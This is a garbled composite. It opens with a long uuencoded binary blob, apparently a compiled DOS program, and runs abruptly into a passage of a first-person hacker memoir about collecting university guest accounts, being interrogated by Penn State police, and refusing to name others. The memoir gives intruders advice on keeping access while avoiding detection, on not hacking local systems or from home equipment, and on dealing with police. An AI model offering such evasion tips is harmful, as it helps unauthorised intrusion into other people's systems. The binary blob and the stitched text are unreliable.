1< M<@(7 (8"%P#, A< U0(7 #4%%P /!A< ?@87 &P&%P!0!A< " "O L '& *Z M!Q@"(@D8 B\(%P *"!< Z0<7 &4'%P!8!Q< 30<7 #8'%P L!Q< '@<7 '0( M%P!D"A< 4@H7 $4*%P U"A< _0D7 ,L)%P"X"1< IPD7 ! )%P $"1< ]0@7 M .D(%P#("A< !0L7 )T/%P"(#Q< $@"O G83%P#?$A< 4)HP!A< @\0$N(, 'E":, 87 M (/$!+B( !Y0FC &%P"#Q 3'1OX (X&N@DFQP9& Z9< N#H N@\"4E"X M- "Z#P)24+@X +H/ E)0N 0 N@\"4E F_S9& )H" / !@\02C@:^"2:C0@ + MP'55C@; "2:#/C@ 75)N $ 4+BR !Y0N+T 'E F_S8X +@$ +H/ E)0FE0 MY@&#Q!".!KX))J-" O =1JX! "Z#P)24+C- !Y0FC &%P"#Q C'1OX! (X& MN@DF_P9& (X&O DFH0( C@:Z"28Y!D8

4)HP!A< M@\0$N.4 ZPJ0N.D ZP20N D!'E":, 87 (OE7P !%97'@8.'U6+=@:+1@B.P+L/ ,UZ70"KE #"O/,\#SJA8?F@8!%P 6'YJ$!!< FMP"%P S[?\VQ '_ M-L(!_S; ?\VO@'_-KP!F@ !0FLH!%P"X% *.V+@# #;'!BP!R@%0FF@" M%P":*P47 +C_ % ._Q8L 0"T,,TAHZ$!N US2&)'HT!C :/ 0X?N ENN( MS2$6'XL.K GC+HX&GP$FBS8L ,4&K@F,VC/;-O\>J@ES!18?Z4,!-L4&L@F, MVKL# #;_'JH)%A^.!I\!)HL.+ #C-H[!,_\F@#T ="RY# "^@ 'SIG0+N?]_ M,\#RKG49Z^4&'@_J &LF)&L_L!T 4BJXO<6'[L$ ("GJ &_N !$S2%R M"O;"@'0%@(^H 4!+>>>^M@F_M@GHE0"^M@F_M@GHC #+58OLOC0,OS0,Z'\ MOK8)O[H)Z'8 ZP-5B^R^N@F_N@GH: "^N@F_N@GH7P":M@(7 O = N#?@8 M=07'1@;_ +D/ +L% /:'J $!= 2T/LTA0^+RZ < BT8&M$S-(8L.K GC![L" M /\>J@D>Q1:- ;@ )H,\!Q1;0 ;0ES2$?PSOWW %R!8OC4E'+H=@!0'4%,\#I0?Y24?\NV %6 M,_:Y0@ RY/RL,N#B^X#T5701FF@"%P"X 0!0FBL%%P"X 0!>RX\&W@&/!N ! MN@( .!:A 70IC@:? 2:.!BP C ;( 3/ F;D @#/_\JZN=?M'1XD^Q@&Y___R MKO?1B]&_ 0"^@0".'I\!K#P@=/L\"73W/ UT;PK =&M'3JP\('3H/ ETY#P- M=%P*P'18/")T)#Q<= -"Z^0SR4&L/%QT^CPB= 0#T>O3B\'1Z1/1J %URNL! M3JP\#70K"L!T)SPB=+H\7'0#0NOL,\E!K#Q<=/H\(G0$ ]'KVXO!T>D3T:@! M==+KEQ8?B3Z\ 0/71]'GT><#UX#B_BOBB\2CO@&,'L !B]@#^Q8'-HD_-HQ7 M H/#!,4VQ@&LJ@K =?J^@0 VCAZ? >L#,\"JK#P@=/L\"73W/ UU ^F$ K M=0/K?I VB3\VC%<"@\,$3JP\('36/ ETTCP-=&(*P'1>/")T)SQ<= .JZ^0S MR4&L/%QT^CPB= :P7/.JZ]&P7-'I\ZIS!K BJNO%3JP\#70N"L!T*CPB=+<\ M7'0#JNOL,\E!K#Q<=/H\(G0&L%SSJNO9L%S1Z?.J_"0#HDP!?B\^+_0/XB2[" 8P>Q $> M!X[>,_9)XQ>!/#M#= F)?@",1@*#Q02LJ@K =?KBZ8E. (E. A8?78OE7!XM6!K[,":T[PG000)9T#)GP$KRP/!CL.+V+1*S2%8L'D#P3=@*P$[OB M =>8HYD!PXK$Z_=5B^R#[ 96N/@'B4;ZC%[\*_;K',1>^B;V1PJ#= X&4YIN M"A< @\0$0'0!1H-&^@RA8 F+%F().4;Z=MB+QEZ+Y5W+D%6+[(/L#%:X! B) M1O:,7OB-1@J)1OJ,5OP>_W;VFM0(%P"#Q 2+\/]V_/]V^O]V"/]V!O]V^/]V M]IK\"A< @\0,B4;T_W;X_W;V5IJ."1< @\0&BT;T7HOE7 %Z B)1O@F]D<*@W0')O9' M"D!T#L1>"": 3PH@N/__Z7 !)O9'"@%UZR: 3PH")H!G"N\KP":)1P2+\(EV M_";V1PH,= /IE@"+PRWX!YFY# #W^8O8T>,#V-'C]H?H" %U?(%^" 0(=0>! M?@H4 G0.@7X($ AU6X%^"A0"=53_=OJ:X!H7 (/$ @O =5'_!O8!@7X(! AU M%(%^"A0"=0W$7@BX^ .Z% +K"Y"0Q%X(N/@%NA0")HE'!B:)5P@FB09N0P M]_F+V-'C ]C1X_:'Z @!=&J+7@@FBSH 2!T M$;@" % KP%!04YI6%1< @\0(Q%X()L1?!HI&!B:(!^L9O@$ B\90C48&%E#_ M=OJ:T!47 (/$"(E&_#EV_'0#Z8?^BD8&*N1>7XOE79 MN0P ]_F+R-'@ \'1X 7H"(E&_(Q>_K@ E":FQ<7 (/$ L1>!":)1P8FB5<( M"]!T$": 3PH(Q%[\)L=' @ "ZR#$7@0F@$\*!(M&_(M6_D FB4<&)HE7",1> M_";'1P(! ,1>!":+1P8FBU<()HD')HE7 B;'1P0 (OE7<-5B^R#[ 96_P;V M 8%^!@0(=12!?@@4 G4-QT;\^ /'1OX4 NL9D(%^!A (=36!?@@4 G4NQT;\ M^ 7'1OX4 L1>!B;V1PH,=1J+PRWX!YFY# #W^8O8T>,#V-'C]H?H" %T!"O MZT^+1@8M^ >9N0P ]_F+R-'@ \'1X 7H"(E&^L1>!HM&_(M6_B:)1P8FB5<( M)HD')HE7 HMV^K@ HE$ B:)1P2+WL8' 8M>!B: 3PH"N $ 7HOE7 % MZ B)1OR,7O[_=@K_=@B:;@H7 (/$!,1>_";&!P FQT<" #$7@@KP)DFB0"":!?P;X W4()H%_"!0"=! F@7\&^ 5U*":!?P@4 M G4@)HI'"YA0FN :%P"#Q (+P'0._W8*_W8(FFX*%P"#Q 2+Y5W+D%6+[(/L M!%8K]L1>!B:*1PHD SP"=5DF]D<*"'4:B\,M^ >9N0P ]_F+V-'C ]C1X_:' MZ @!=#B+7@8FBP!B:+1P8FBU<()HD')HE7 B;'1P0 (O&7HOE M7S@J+1@Z+5A"CN@J)%KP*BT8&BU8(HZ * MB1:B"L<&Q@H ,<&Q H .E! X!^]B5T ^FG L<&R H! "O HZH*HZ8*H\(* MHZ@*H\ *H[X*HZ0*HYX*H[@*QP8R#" Q%X*)H!_ 3!U2?]&"L<&,@PP .L^ MD(M>"B: /RMU#?\&J@K'!KX* #K*) F@#\@=0Z#/JH* '4:_P:^"NL4D/\& MG@KK#<1>"B: /RUUQ_\&N K_1@J+7@HFB@>84 [H2@F#Q (+P'7=_W8,_W8* MN- *'E .Z)((@\0(B48*B58,@S[0"@!]#/\&N JAT KWV*/0"L1>"B: /RYU M+O\&P K_1@H&_W8*N,@*'E .Z%D(@\0(B48*B58,@S[("@!]"L<&R H! /\. MP K$7@HFB@>8/48 =#T]3@!T0#UH '0K/6P =0;'!J@* @"#/J@* '4)Q%X* M)H _3'4#_T8*Q%X*)H _ '40QP;*"@ M_P; "L<&R H$ (,^J H(=0/ID KP*.H"HE&^CD&T IT)Z'0"HE&^H,^N H M= G'!M * #K$I"#+M *!:'0"@O ?0(KP*/0"H,&N@H"N! 4 [H/@&#Q *X M.@!0#NB)!(/$ H-^^@!T(H,^N H =!6+1OHM!0"CT H+P'T"*\"CT KK!Y#' M!M * "#+KH*!+@0 % .Z/L @\0"@P:Z"@+K;9"X$ #I)_\KP% .Z%D"Z2+_ MN $ Z_.0_W;X#N@] ^D2_X,^J H = F+1@J+5@S_3@J+1@J+5@Q B4;\B5;^ MZU*0R@W>#- -T W0#=H-W@S:#=H-V@W:#<0,\@SX#-H-V@W #=H-V@S:#=H- MN@V#/L8* '05@S[$"@!U;L0>H HF]D<*('5>ZV&0_T8*ZS20_T;\Q%[\)HH' MB$;V"L!T!#PE=>R+PRM&"E#_=@S_=@H.Z$P$@\0&BT;\BU;^B48*B58,Q%X* M)HH'B$;V"L!T ^FO_(,^Q H =1#$'J *)O9'"B!T!;C__^L#H<0*B^5=RY!5 MB^R#[!)75H-^!@IT!/\&P@J#/J@* G0'@SZH"A!U&,0>N@HFBPN@HFBP>9B4;\ MB5;^@P:Z"@*#/IX* '0.BT;\"T;^= :+1@;K Y KP*,P#*',"HL6S@J)1O*) M5O2#/L(* '4Q@W[^ 'TK@WX&"G4=Q%[R_T;R)L8'+8M&_(M6_O?8@]( ]]J) M1OR)5O['1O8! .L&D,=&]@ N*P*B4;XC%[Z_W8&'E#_=O[_=OR:UAH7 (/$ M"H,^P H =#'_=OK_=OB:OAH7 (/$!(L.R HKR(E.\,1^\NL%)L8%,$>+P4D+ MP'_TB7[RC$;TB4[PBPZF"HQ>[L5V\L1>^":*!X@$"\ET!SQA? . +"!&_T;X M)H _ '7CB7;RC%[TCE[N@S[""@!U%*&J"@L&O@IT"X-^]@!U!;@! .L"*\!0 M#N@7 X/$ EY?B^5=RU6+[(/L$%=6@WX& '08O@$ H;H*BQ:\"HE&^(E6^H,& MN@H"Z94 @SZH"@AT&<0>N@HFBPF@F#Q 2#!KH*",<&, P *&J"@L& MO@IT&_]V_O]V_(X&P@DF_QZ>"8/$! O = 6X 0#K BO 4 [H,P&+Y5W+D%6+ M[%:#/L8* '4]Q!Z@"B;_3P1X%8I&!B:+-R;_!R:.1P(FB 0JY.L1D/\VH@I3 M_W8&FHP&%P"#Q 9 =0?_!L8*ZP60_P;$"EY=RY!5B^R#[ )75H,^Q@H =5>+ M=@8+]GY0ZQO_-J(*_S:@"O\V,@R:C 87 (/$!D!U!/\&Q@J+QDX+P'X>Q!Z@ M"B;_3P1XU* R#":+/R;_!R:.1P(FB 4JY.O4@S[&"@!U!XM&!@$&Q I>7XOE M7!B:*!\0>H HFBS\F_P+1@H!!L0*7E^+Y5W+58OL@^P,5J',"HL6S@J) M1O2)5O8KP(E&_(E&^H,^,@PP=1@Y!L *=!(Y!J0*= 8Y!LH*=0;'!C(,( "+ M-M *_W;V_W;TFKX:%P"#Q 2)1O@K\"MV!H,^N H =2+$7O0F@#\M=1F#/C(, M,'42_T;T)HH'F% .Z%K^@\0"_T[X@SXR##!T"POV?@>#/K@* '0;@WX& '0' M_T;Z#NAI (,^, P = ?_1OP.Z', @SZX"@!U*58.Z&?^@\0"@WX& '0*@W[Z M '4$#N@\ (,^, P = J#?OP =00.Z$, _W;X_W;V_W;T#NBB_H/$!H,^N H M= ['!C(,( !6#N@A_H/$ EZ+Y5W+D(,^J@H = 6X*P#K [@@ % .Z+C]@\0" MR[@P % .Z*S]@\0"@SXP#!!U%X,^I@H = 6X6 #K [AX % .Z([]@\0"RU6+ M[(/L!E=6QT;^ 0#$7@HF@#\J=1+$'KH*)HLW@P:Z"@+_1@KK89#$7@HF@#\M M=0C'1O[___]&"BOVBUX*)HH'B$;Z/#!\0#PY?SPY-L *=0H\,'4&QP8R## MB_OK!B: /3E_'":*!9B+SM'AT>$#SM'A \B#Z3"+\4X<@F)1OR,7OZ*3@;$ M?OSK 42BX !;YZS:)5OZ)1OR+T;@"0LTA T8($U8*>0V+3OZ+5ORX M $+-(>O8BU8(BTX*BD8,M$+-(7(%@*>H ?WIV^]5B^R#[ B+7@8['J8!<@>X M GYZ<7O]H>H 2!T"[@"0C/)B]'-(7+K]H>H 8!T?(Q>^HY&"L56"#/ B4;^ MB4;\_%=6B_J+\HEF^(M.#.->L KRKG51'HY>^IH:%Q< 'SVH '9+@^P"B]RZ M (]* )S [J "OBB]2+^A8'BTX,K#P*= P[^W09JN+TZ"8 ZV^P#3O[=0/H M&P"JL K_1OSKX^@0 .OB7E^.7OKK8^M0,\#I;>I04U$>!A^+SRO*XQ"+7@:T M0,TA<@X!1OX+P'0''UE;6(OZPQ^#Q AS!+0)ZR2.7O[VAZ@!0'0.CEX*BUX( M@#\:=0/XZPSYN 7XY>^NG+[HM.# O)=06+P>F_[A[% M5@BT0,TA'@O@"\!UW/:'J % = N+VB: /QIU _CKROFX !SKQ !9 M6J'< 3O$!@O;= 2 3_X!B^5=RU6+[%97NW@) M@S\ =2D>![@% .A- G4%,\"9ZR1 )/ZC> FC>@F6QP0! (/&!,=$_O[_B39^ M"8M.!HS8CL#HXP!?7HOE7@SZ""0!U".@E '02HX()Z(L =17H& !T!>B! '4+_W8&FD 7 M%P"#Q )?7HOE7!D.#X_Z)7OXSP!Y04(U/#E&P E":Q!D7 M (/$"(/Z_W1!B\*'%H0)HX8).P:*"78#HXH)"])T!8[:HP@ BU[^CM@SP*,( M $A(B4<,N H HP HP( C4A@GH M"P +THS!CMG# .G. $%T^H#A_H/Y[G/RBW<"_*V+_J@!=$)(.\%S%8O0 _"M MJ %T- /"!0( B_>)1/[KYHO^= P#^8E,_BO!2(D%ZP4#^?Y,_HO&C-J,T3O1 M= 4FC!Z&"8E_ L,FQ@:,"0(]_O]T)8O^ _"MJ %T\HO^2#O!<[V+T /PK:@! M=.(#P@4" (OWB43^Z^:+1P@+P'0$CMCK%";^#HP)=!&,V(S7.\=T!2:.'H() MBS?KO(MW!C/ Z&H .\9T#20!0$"8Z%X = W^3?[H' !T!99.3NN9C-B,T3O! M= 0FHX8)BP>)1P(SP)G#48M%_J@!= ,KR$E!0;K_?R8[%H@)=@31ZG7UB\$# MQG(5 \)R#??2(\(KQN@, '4(]]+1ZG7E,\!9PU)1Z!T =!A7B_Z+\ /RQT3^ M_O^)=P:+UBO72HE5_EA96L-34#/2'E)24+@! % &'YK$&1< @\0(@_K_'UI; M= (+TL, 58OL5E<&@WX* '4XORX!BU8(BT8&2'4'Z%, L_B]H#''(YB]..P3OW=08Y'B@!O1ZSOW=0D#V:&? 2O8 MCL"T2LTA<@T[]W4$B18H 9*'!(O1PU6+[(O7B]X>Q78*B_Z,V([ ,\"Y___R MKO?1Q'X&B\>H 70"I$G1Z?.E$\GSI(OSB_H?C,)=RU6+[(O7Q'X&,\"Y___R MKO?129&+^EW+ %6+[%97LP#I' %5B^R+7@8['J8!?1&#^P!\#/:'J % = 6X M 0#K C/ B^5=RP!5B^R+1@@K1@P;T@/ $](#P!/2 \ 3T@/ $](#1@:#T@ K M1@J#V@"+Y5W*" 58OLBTX."\EU ^FU !Y75L5V"L1^!AY6!E>:!!L7 (M. M#@O2>%,V 4 $([8 _ES!XS !0 0CL!!B\%(*\<;VR/# M \-<@_[_=0>,V"T $([8@___==&,P"T $([ MZ\B+P4B+U_?2*\(;VR/# \*+UO?2*\(;VR/# \) D2O!T>GSI1/)\Z21XQ@+ M]G4'C-@% !".V O_=<>,P 4 $([ Z[Y>7Q^+1@:+5@A=RXM.#HM&!HM6"![% M?@I7'@?\DPK =!.#^0IU#@O2>0JP+:KWVX/2 /?:B_>2,](+P'0"]_&3]_&2 MA],$,#PY=@($)ZJ+P@O#=>*(!4^LA@6(1/^-1 $[QW+RC-I8'U]>B^5=RU6+ M[%<>5AZX[0&.V+@ >LTO//]T"!^P\+0 ZW.0B3X, (P&#@ ?L !5NQ !E6] M[0&.Q2:#/@X '4(70>P\+0 ZQN]:@ .52;_-@X )O\V# "+[(Y&"HMN",N# MQ 1=4,5V!HS8"\9T H@\Q78*C-@+QG0"B!S%=@Z,V O&= *)#,5V$HS8"\9T M HD46+0 7A]?77\M5B^R#[$;&1OX6 MBD8&B$;_QT;\ @#'1KP^ (U&O!90C4;\%E"PXU":#@#Z 8/$"HE&N@O =7*+ M1A(+1A!T&/]VP/]VOIH* P"@\0$Q%X0)HD')HE7 HM&#@M&#'01_W;"F@T M#0*#Q +$7@PFB0>+1@H+1@AT$XU&Q!90_W8*_W8(FH@:%P"#Q B+1A8+1A1T M%+@' %"-1O064/]V%O]V%)HR&Q< *\"+Y5W+58OL'E97BF8&Q78(Q'X,S2&T M %]>'UW+58OL@>R$ %:*1@:(1HC_=@R:#0 - H/$ HE&B?]V"O]V")J^&A< M@\0$B89^__]V$/]V#IJ^&A< @\0$B4:$_W84_W82FKX:%P"#Q 2)1OZ*AG[_ MB$:+_[9^__]V"O]V"(U&C!90FC(;%P"#Q J*1H2+MG[_@\8&B$*&_W:$_W80 M_W8.C4*'%E":,AL7 (/$"O]V%IH- T"@\0"BW:$ [9^_X/&!XU:AHD'BD;^ M1D:(0H:-1 &)1H+_=O[_=A3_=A*+\(U"AA90FC(;%P"#Q J+1OX#1H0#AG[_ M!0@ B4:&QT: "-1H 64(U&AA90L.-0F@X ^@&#Q J)AGS_7HOE77)I9VAT("AC*2 Q.3@X+"!-:6-R;W-O9G0@0V]RFrom the beginning of this semester, I neglected my classes, and instead read RFCs and Unix system security manuals. I began experimenting with the communications capabilities of the TCP/IP protocol suite, and began to understand more deeply how it was that such a network could exist as an organic whole greater than the sum of its parts. In the interest of experimenting with these interconnections, I began to acquire a number of Internet 'guest' accounts. When possible, I would use these to expand my area of access, with the goal of testing the speed and reliability of the network; and, I freely admit, for my amusement. I realized, at the time, that what I was doing was, legally, in a gray area; but I did not give moral considerations more than a passing thought. Later, I had leisure to ponder the moral and legal aspects of my actions at great length, but at the time I was collecting accounts I only considered the technical aspects of what I was doing. I discovered Richard Stallman's accounts on a variety of computers. I used these only for testing mail and packet routing. I realized that it would be trivial to use them for malicious purposes, but the thought of doing so did not occur to me. The very idea of hacking a computer system implies the desire to outsmart the security some unknown person had designed to prevent intrusion; to abuse a trust in this manner has all the appeal to a hacker that a hunter would find in stalking a kitten with a howitzer. To hack an open system requires no intelligence and little knowledge, and imparts no deeper knowledge than is available by legitimate use of the system. I soon had a collection of accounts widely scattered around the continent: at the University of Chicago, at the Pennsylvania State University, at Johns Hopkins, at Lawrence-Berkeley Laboratories and a number of commercial and government sites. However, the deadly mistake of hacking close to home was my downfall. I thought I was untouchable and infallible, and in a regrettable accident I destroyed the /etc/groups file at the Software Engineering Laboratory at Penn State, due to a serious lapse in judgment combined with a series of typographical errors. This is the only action for which I should have been held accountable; however, as you shall see, it is the only action for which I was not penalized in any way. I halt the narrative here to deliver some advice suggested by my mistakes. My first piece of advice is: avoid the destruction of information by not altering any information beyond that necessary to maintain access and avoid detection. Try to protect yourself from typographical errors by backing up information. My lack of consideration in this important regard cost Professor Dhamir Mannai many hours reconstructing the groups file. Dhamir plays a major role in the ensuing fracas, and turned out very sympathetic. I must emphasize that the computer security people with whom we have such fun are often decent people. Treat a system you have invaded as you would wish someone to treat your system if they had done the same to you. Protect both the system and yourself. Damage to the system will have a significant effect on any criminal case which is filed against you. Even the harshest of judges is likely to respond to a criminal case with a bewildered dismissal if no damage is alleged. However, if there is any damage to a system, the police will most certainly allege that you maliciously damaged the machine. It is their job to do so. My second piece of advice is: avoid hacking systems geographically local to you, even by piggybacking multiple connections across the country and back to mask your actions. In any area there is a limited number of people both capable of and motivated to hack. When the local security gurus hear that a hacker is on the loose, they will immediately check their mental list of people who fit the profile. They are in an excellent position to monitor their own network. Expect them to do so. I now return to my narrative. Almost simultaneous with my activities, the Computer Emergency Response Team was formed in the wake of the Morris Worm, and was met with an almost palpable lack of computer crime worth prosecuting. They began issuing grimly-worded advisories about the ghastly horrors lurking about the Internet, and warned of such dangerous events as the WANK (Worms Against Nuclear Killers) worm, which displayed an anti-nuclear message when a user logged on to an infected machine. To read the newspaper article concerning Dale and me, a person who collects guest accounts is, if not Public Enemy Number One, at least a major felon who can only be thwarted by the combined efforts of a major university's police division, two computer science departments, and Air Force Intelligence, which directly funds CERT. Matt Crawford, at the University of Chicago, notified CERT of my intrusions into their computer systems. The slow machinery of justice began to creak laboriously into motion. As I had taken very few precautions, they found me within two weeks. As it happens, both the Penn State and University of Chicago systems managers had publicly boasted about the impenetrability of their systems, and perhaps this contributed to their rancor at discovering that the nefarious computer criminal they had apprehended was a Comparative Literature major who had failed his only computer science course. IV. In the Belly of the Beast When we arrived at the police station, the police left me in a room alone for approximately half an hour. My first response was to check the door of the room. It was unlocked. I checked the barred window, which was locked, but could be an escape if necessary. Then, with nothing to do, I considered my options. I considered getting up and leaving, and saying that I had nothing to discuss with them. This was a sensible option at the outset, I thought, but certainly not sensible now. This was a repetition of a mistake; I could have stopped talking to them at any time. Finally, I assumed the lotus position on the table in order to collect my thoughts. When I had almost collected my thoughts, Anne Rego and Sam Ricciotti returned to the room, accompanied by two men I took to be criminals at first glance: a scruffy, corpulent, bearded man I mentally tagged as a public indecency charge; and a young man with the pale and flaccid ill-health of a veal calf, perhaps a shoplifter. However, the pair was Professor Robert Owens of the computer science department and Daniel Ehrlich, Owens' student flunky. Professor Owens sent Ehrlich out of the room on some trivial errand. Ricciotti began the grilling. First, he requested that I sign a document waiving my Miranda rights. He explained that it was as much for my benefit as for theirs. I laughed out loud. However, I thought that as I had done nothing wrong, I should have no fear of talking to them, and I signed the fatal document. I assumed that what I was going to say would be taken at face value, and that my innocence was invulnerable armor. Certainly I had made a mistake, but this could be explained, could it not? Despite my avowed radical politics, my fear of authority was surpassed by a trust for apparent sincerity. As they say, a con's the easiest mark there is. I readily admitted to collecting guest accounts, as I found nothing culpable in using a guest account, my reasoning being that if a public building had not only been unlocked, but also a door in that building had been clearly marked as for a "Guest," and that door opened readily, then no one would have the gall to arrest someone for trespass, even if other, untouched parts of the building were marked "No Visitors." Using a 'guest' account is no more computer crime than using a restroom in a McDonald's is breaking-and-entering. Ricciotti continued grilling me, and I gave him further information. I fell prey to the temptation to explain to him what he clearly did not understand. If you are ever in a similar circumstance, do not do so. The opaque ignorance of a police officer is, like a well- constructed security system, a very tempting challenge to a hacker. However, unlike the security system, the ignorance of a police officer is uncrackable. If you attempt to explain the Internet to a police officer investigating you for a crime, and the notion of leased WATS lines seems a simple place to start, it will be seen as evidence of some vast, bizarre conspiracy. The gleam in the cop's eye is not one of comprehension; it is merely the external evidence that a power fantasy is running in the cop's brain. "I," the cop thinks, "will definitely be Cop of the Year! I'm going to find out more about this Internet thing and bust the people responsible." Perhaps you will be lucky or unlucky enough to be busted by a cop who has some understanding of technical issues. Never having been busted by a computer-literate cop, I have no opinion as to whether this would be preferable. However, having met more cops than I care to remember, I can tell you that the chances are slim that you will meet a cop capable of tying shoelaces in the morning. The chances of meeting a cop capable of understanding the Internet are nearly nonexistent. Apparently, this is changing, but by no means as rapidly as the volatile telecommunications scene. At present, the cop who busts you might have a Mac hooked up to NCIC and be able to use it clumsily; or may be able to cope with the user interface of a BBS, but don't bother trying to explain anything if the cop doesn't understand you. If the cop understands you, you have no need to explain; if not, you are wasting your time. In either case, you are giving the police the rope they need to hang you. You have nothing to gain by talking to the police. If you are not under arrest, they can do nothing to you if you refuse to speak to them. If you must speak to them, insist on having an attorney present. As edifying as it is to get a first-hand glimpse of the entrenched ignorance of the law- enforcement community, this is one area of knowledge where book-learning is far preferable to hands-on experience. Trust me on this one. If you do hack, do not use your personal computing equipment and do not do it from your home. To do so is to invite them to confiscate every electronic item in your house from your telephone to your microwave. Expert witnesses are willing to testify that anything taken could be used for illegal purposes, and they will be correct. Regardless of what they may say, police have no authority to offer you anything for your cooperation; they have the power to tell the magistrate and judge that you cooperated. This and fifty cents will get you a cup of coffee. Eventually, the session turned into an informal debate with Professor Owens, who showed an uncanny facility for specious argument and proof by rephrasing and repeating. The usual argument ensued, and I will encapsulate rather than include it in its entirety. "If a bike wasn't locked up, would that mean it was right to steal it or take it for a joyride?" "That argument would hold if a computer were a bike; and if the bike weren't returned when I was done with it; and if, in fact, the bike hadn't been in the same damn place the whole time you assert it was stolen." "How do you justify stealing the private information of others?" "For one thing, I didn't look at anyone's private information. In addition, I find the idea of stealing information so grotesque as to be absurd. By the way, how do you justify working for Penn State, an institution that condoned the illegal sale of the Social Security Numbers of its students?" "Do you realize what you did is a crime?" interjected Ricciotti. "No, I do not, and after reading this law you've shown me, I still do not believe that what I did violates this law. Beyond that, what happened to presumed innocent until proven guilty?" The discussion continued in a predictable vein for about two hours, when we adjourned until the next day. Sam sternly advised me that as this was a criminal investigation in progress, I was not to tell anyone anything about it. So, naturally, I immediately told everyone I knew everything I knew about it. With a rapidly mounting paranoia, I left the grim, cheerless interrogation room and walked into the bustle of an autumn day at Penn State, feeling strangely separate from the crowd around me, as if I had been branded with a scarlet 'H.' I took a circuitous route, often doubling back on myself, to detect tails, and when I was sure I wasn't being followed, I headed straight for a phone booth to call the Electronic Music Lab. The phone on the other end was busy. This could only mean one thing, that Dale was online. His only crime was that he borrowed an account from the legitimate user, and used the Huang account at the Engineering Computer Lab, but I realized after my discussion with the police that they would certainly not see the matter as I did. I realized that the situation had the possibility to erupt into a very ugly legal melee. Even before Operation Sun-Devil, I realized that cops have a fondness for tagging anything a conspiracy if they feel it will garner headlines. I rushed to the Lab. V. A Desperate Conference "Get off the computer now! I've been busted!" "This had better not be a goddamn joke." He rapidly disconnected from his session and turned off the computer. We began to weigh options. We tried to figure out the worst thing they could do to me. Shortly, we had a list of possibilities. The police could jail me, which seemed unlikely. The police could simply forget about the whole thing, which seemed very unlikely. Anything between those two poles was possible. Anything could happen, and as I was to find, anything would. We planned believing that it was only I who was in jeopardy. If you are ever busted, you will witness the remarkable migration habits of the fair-weather friend. People who yesterday had nothing better to do than sit around and drink your wine will suddenly have pressing duties elsewhere. If you are lucky, perhaps half a dozen people will consent to speak to you. If you are very lucky, three of them will be willing to be seen with you in public. Very shortly the police would begin going after everyone I knew for no other reason than that they knew me. I was very soon to be given yet another of the blessings accorded to those in whom the authorities develop an interest. I would discover my true friends. I needed them. VI. The Second Interrogation I agreed to come in for a second interview. At this interview, I was greeted by two new cops. The first cop, with the face of an unsuccessful pugilist, was Jeffery Jones. I detested him on sight. The second, older cop, with brown hair and a mustache, was Wayne Weaver, and had an affable, but stern demeanor, somewhat reminiscent of a police officer in a fifties family sitcom. As witness to this drama, a battered tape recorder sat between us on the wooden table. In my blithe naivete, I once again waived my Miranda rights, this time on tape. The interview began with a deranged series of accusations by Jeffery Jones, in which were combined impossibilities, implausibilities, inaccuracies and incongruities. He accused me of everything from international espionage to electronic funds transfer. Shortly he exhausted his vocabulary with a particularly difficult two-syllable word and lapsed into silence. Wayne filled the silence with a soft-spoken inquiry, seemingly irrelevant to the preceding harangue. I answered, and we began a more sane dialogue. Jeffery Jones remained mostly silent. He twiddled his thumbs, studied the intricacies of his watch, and investigated the gum stuck under the table. Occasionally he would respond to a factual statement by rapidly turning, pounding the table with his fists and shouting: "We know you're lying!" Finally, after one of Jeffery's outbursts, I offered to terminate the interview if this silliness were to continue. After a brief consultation with Wayne, we reached an agreement of sorts and Jeff returned to a dumb, stony silence. I was convinced that Wayne and Jeff were pulling the good cop/bad cop routine, having seen the mandatory five thousand hours of cop shows the Nielsen people attribute to the average American. This was, I thought, standard Mutt and Jeff. I was to change my opinion. This was not good cop/bad cop. It was smart cop/dumb cop. And, more frighteningly, it was no act. After some more or less idle banter, and a repetition of my previous story, and a repetition of my refusal to answer certain other questions, the interrogation began to turn ugly. Frustrated by my refusal to answer, he suddenly announced that he knew I was involved in a conspiracy, and made an offer to go easy on me if I would tell him who else was involved in the conspiracy. I refused point-blank, and said that it was despicable of him to request that I do any such thing. He began to apply pressure and I will provide a reconstruction of the conversation. As the police have refused all requests by me to receive transcripts of interviews, evidence and information regarding the case, I am forced to rely on memory. "These people are criminals. You'd be doing the country a service by giving us their names." "What people are criminals? I don't know any criminals." "Don't give me that. We just want their names. We won't do anything except ask them for information." "Yeah, sure. Like I said, I don't know any criminals. I'm not a criminal, and I won't turn in anyone for your little witch-hunt, because I don't know any criminals, and I'd be lying if I gave you any names." "You're not going to protect anyone. We'll get them anyway." "If you're going to get them, you don't need my help." "We won't tell anyone that you told them about us." "Fuck that. I'll know I did it. How does that affect the morality of it, anyway?" Dropping the moral argument, he went to the emotional argument: "If you help us, we'll help you. When you won't help us, you stand alone. Those people don't care about you, anyway." "What people? I don't know any people." "Just people who could help us with our investigation. It doesn't mean that they're criminals." "I don't know anything about any criminals I said." "In fact, one of your friends turned you in. Why should you take this high moral ground when you're a criminal anyway, and they'd do the same thing to you if they were in the situation you're in. You just have us now, and if you won't stand with us, you stand alone." "I don't have any names. And no one I knew turned me in." This tactic, transparent as it was, instilled a worm of doubt in my mind. That was its purpose. This is the purpose of any of the blandishments, threats and lies that the police will tell you in order to get names from you. They will attempt to make it appear as if you will not be harming the people you tell them about. Having been told that hackers are just adolescent pranksters who will crack like eggs at the slightest pressure and cough up a speech of tearful remorse and hundreds of names, they will be astonished at your failure to give them names. I will here insert a statement of ethics, rather than the merely practical advice which I have heretofore given. If you crack at the slightest pressure, don't even bother playing cyberpunk. If your shiny new gadget with a Motorola 68040 chip and gee-whiz lightning Weitek math co-processor is more important to you than the lives of your friends, and you'd turn in your own grandmother rather than have it confiscated, please fuck off. The computer underground does not need you and your lame calling-card and access code rip-offs. Grow up and get a job at IBM doing the same thing a million other people just like you are doing, buy the same car a million other people just like you have, and go to live in the same suburb that a million other people like you call home, and die quietly at an old age in Florida. Don't go down squealing like a pig, deliberately and knowingly taking everyone you know with you. If you run the thought-experiment of imagining yourself in this situation, and wondering what you would do, and this description seems very much like what meets you in the bathroom mirror, please stop hacking now. However, if you feel you must turn someone in to satisfy the cops, I can only give the advice William S. Burroughs gives in _Junky_ to those in a similar situation: give them names they already have, without any accompanying information; give them the names of people who have left the country permanently. Be warned, however, that giving false information to the police is a crime; stick to true, but entirely useless information. Now, for those who do not swallow the moral argument for not finking, I offer a practical argument. If you tell the police about others you know who have committed crimes, you have admitted your association with criminals, bolstering their case against you. You have also added an additional charge against yourself, that of conspiracy. You have fucked over the very friends you will sorely need for support in the near future, because the investigation will drag on for months, leaving your life in a shambles. You will need friends, and if you have sent them all up the river, you will have none. Worse, you will deserve it. You have confessed to the very crimes you are denying, making it difficult for you to stop giving them names if you have second 